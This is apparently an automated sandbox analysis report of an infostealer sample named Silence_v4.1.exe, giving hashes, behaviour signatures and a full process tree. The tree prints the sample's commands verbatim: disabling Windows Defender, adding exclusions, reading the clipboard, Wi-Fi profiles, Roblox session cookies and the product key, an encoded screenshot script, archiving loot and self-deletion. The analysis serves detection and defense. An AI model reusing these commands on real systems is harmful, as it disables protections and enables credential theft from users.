Analysis

  • max time kernel
    138s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24-05-2024 16:35

General

  • Target

    Silence_v4.1.exe

  • Size

    7.4MB

  • MD5

    48b06f94db083960d359ce33819e7231

  • SHA1

    c66449c54bf2a2ff1477699823edbdb4b034f0c0

  • SHA256

    a51e8d6617f70f2db4a475514a93a558b791ec8680266c6c4cfd0d40545ce142

  • SHA512

    8ab275843655fb738861b55e66be7b0c2301d0ab97621e91db94cdbb95cbf14892a59fa48d1d17a91f3fcd330a24a7c75c9815d42a56aa01d5c35a96cdda6691

  • SSDEEP

    196608:urVW0cDEVLjv+bhqNVoBKUh8mz4Iv9PbruQdz:AiEtL+9qz8/b4Ituiz

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 29 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe
    "C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3252
    • C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe
      "C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:180
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:5024
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1152
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2812
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again later', 0, 'Silence Error', 0+16);close()""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1512
        • C:\Windows\system32\mshta.exe
          mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('please try again later', 0, 'Silence Error', 0+16);close()"
          4⤵
            PID:3492
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4588
          • C:\Windows\system32\attrib.exe
            attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe"
            4⤵
            • Views/modifies file attributes
            PID:4960
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​‏‌  .scr'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:5092
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\​‏‌  .scr'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3200
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1016
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3052
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:3936
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2820
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            4⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1032
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:4972
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3576
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            4⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1788
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:3392
          • C:\Windows\system32\tree.com
            tree /A /F
            4⤵
              PID:3616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:2480
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              4⤵
                PID:996
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:3928
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                4⤵
                • Gathers system information
                PID:1556
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2200
              • C:\Windows\system32\reg.exe
                REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                4⤵
                  PID:1576
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:4288
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                  4⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2680
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zgkvxbt4\zgkvxbt4.cmdline"
                    5⤵
                      PID:3392
                      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6206.tmp" "c:\Users\Admin\AppData\Local\Temp\zgkvxbt4\CSCD7A0640F47EF47AF9C3C3274BB77BC5F.TMP"
                        6⤵
                          PID:1752
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    3⤵
                      PID:3828
                      • C:\Windows\system32\tree.com
                        tree /A /F
                        4⤵
                          PID:2724
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                        3⤵
                          PID:4984
                          • C:\Windows\system32\attrib.exe
                            attrib -r C:\Windows\System32\drivers\etc\hosts
                            4⤵
                            • Drops file in Drivers directory
                            • Views/modifies file attributes
                            PID:4048
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          3⤵
                            PID:4396
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              4⤵
                                PID:2692
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                              3⤵
                                PID:1232
                                • C:\Windows\system32\attrib.exe
                                  attrib +r C:\Windows\System32\drivers\etc\hosts
                                  4⤵
                                  • Drops file in Drivers directory
                                  • Views/modifies file attributes
                                  PID:4912
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                3⤵
                                  PID:684
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    4⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4216
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:3552
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:4680
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                      3⤵
                                        PID:2232
                                        • C:\Windows\system32\tasklist.exe
                                          tasklist /FO LIST
                                          4⤵
                                          • Enumerates processes with tasklist
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:3936
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                        3⤵
                                          PID:1516
                                          • C:\Windows\system32\tree.com
                                            tree /A /F
                                            4⤵
                                              PID:4468
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                                            3⤵
                                              PID:3920
                                              • C:\Windows\system32\tree.com
                                                tree /A /F
                                                4⤵
                                                  PID:1384
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                3⤵
                                                  PID:1692
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                    4⤵
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:1528
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "getmac"
                                                  3⤵
                                                    PID:2772
                                                    • C:\Windows\system32\getmac.exe
                                                      getmac
                                                      4⤵
                                                        PID:5020
                                                    • C:\Windows\system32\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\AC3iS.zip" *"
                                                      3⤵
                                                        PID:1736
                                                        • C:\Users\Admin\AppData\Local\Temp\_MEI32522\rar.exe
                                                          C:\Users\Admin\AppData\Local\Temp\_MEI32522\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\AC3iS.zip" *
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:2912
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                        3⤵
                                                          PID:4292
                                                          • C:\Windows\System32\Wbem\WMIC.exe
                                                            wmic os get Caption
                                                            4⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2480
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                          3⤵
                                                            PID:32
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic computersystem get totalphysicalmemory
                                                              4⤵
                                                                PID:2172
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                              3⤵
                                                                PID:2424
                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                  wmic csproduct get uuid
                                                                  4⤵
                                                                    PID:3852
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                                  3⤵
                                                                    PID:2464
                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                      4⤵
                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                      PID:4820
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                    3⤵
                                                                      PID:3288
                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                        wmic path win32_VideoController get name
                                                                        4⤵
                                                                        • Detects videocard installed
                                                                        PID:1872
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                      3⤵
                                                                        PID:1584
                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                          4⤵
                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                          PID:4824
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Silence_v4.1.exe""
                                                                        3⤵
                                                                          PID:1476
